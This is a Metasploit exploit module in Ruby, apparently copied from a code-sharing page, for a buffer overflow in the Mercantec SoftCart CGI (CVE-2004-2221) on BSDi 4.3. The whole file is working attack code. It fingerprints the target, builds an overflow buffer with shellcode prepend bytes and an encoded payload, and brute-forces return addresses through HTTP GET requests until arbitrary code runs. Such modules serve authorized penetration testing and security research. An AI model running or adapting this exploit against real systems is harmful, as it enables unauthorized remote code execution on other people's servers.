Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Brute
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Mercantec SoftCart CGI Overflow',
15
      'Description'    => %q{
16
        This is an exploit for an undisclosed buffer overflow
17
        in the SoftCart.exe CGI as shipped with Mercantec's shopping
18
        cart software.  It is possible to execute arbitrary code
19
        by passing a malformed CGI parameter in an HTTP GET
20
        request.  This issue is known to affect SoftCart version
21
        4.00b.
22
      },
23
      'Author'         => [ 'skape', 'trew' ],
24
      'References'     =>
25
        [
26
          [ 'CVE', '2004-2221'],
27
          [ 'OSVDB', '9011'],
28
          [ 'BID', '10926'],
29
        ],
30
      'Privileged'     => false,
31
      'Payload'        =>
32
        {
33
          'Space'    => 1000,
34
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",
35
          'MinNops'  => 16,
36
          'Prepend'  => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",
37
          'PrependEncoder' => "\x83\xec\x7f",
38
        },
39
      'Platform'       => 'bsdi',
40
      'Targets'        =>
41
        [
42
          [
43
            'BSDi/4.3 Bruteforce',
44
            {
45
              'Bruteforce' =>
46
                {
47
                  'Start' => { 'Ret' => 0xefbf3000 },
48
                  'Stop'  => { 'Ret' => 0xefbffffc },
49
                  'Step'  => 0
50
                }
51
            },
52
          ],
53
        ],
54
      'DisclosureDate' => '2004-08-19',
55
      'DefaultTarget'  => 0))
56

57
    register_options(
58
      [
59
        OptString.new('URI', [ false, "The target CGI URI", '/cgi-bin/SoftCart.exe' ])
60
      ])
61
  end
62

63
  def brute_exploit(address)
64
    if not (@mercantec)
65
      res = send_request_raw({
66
        'uri'   => normalize_uri(datastore['URI'])
67
      }, 5)
68
      @mercantec = (res and res.body and res.body =~ /Copyright.*Mercantec/)
69
      fail_with(Failure::NotFound, "The target is not a Mercantec CGI") if not @mercantec
70
    end
71

72
    buffer =
73
      "MAA+scstoreB" +
74
      rand_text_alphanumeric(512) +
75
      [address['Ret']].pack('V') +
76
      "MSF!" +
77
      [address['Ret'] + payload.encoded.length].pack('V') +
78
      payload.encoded
79

80
    print_status("Trying #{"%.8x" % address['Ret']}...")
81
    res = send_request_raw({
82
      'uri'   => normalize_uri(datastore['URI']),
83
      'query' => buffer
84
    }, 5)
85

86
    handler
87
  end
88
end
89

90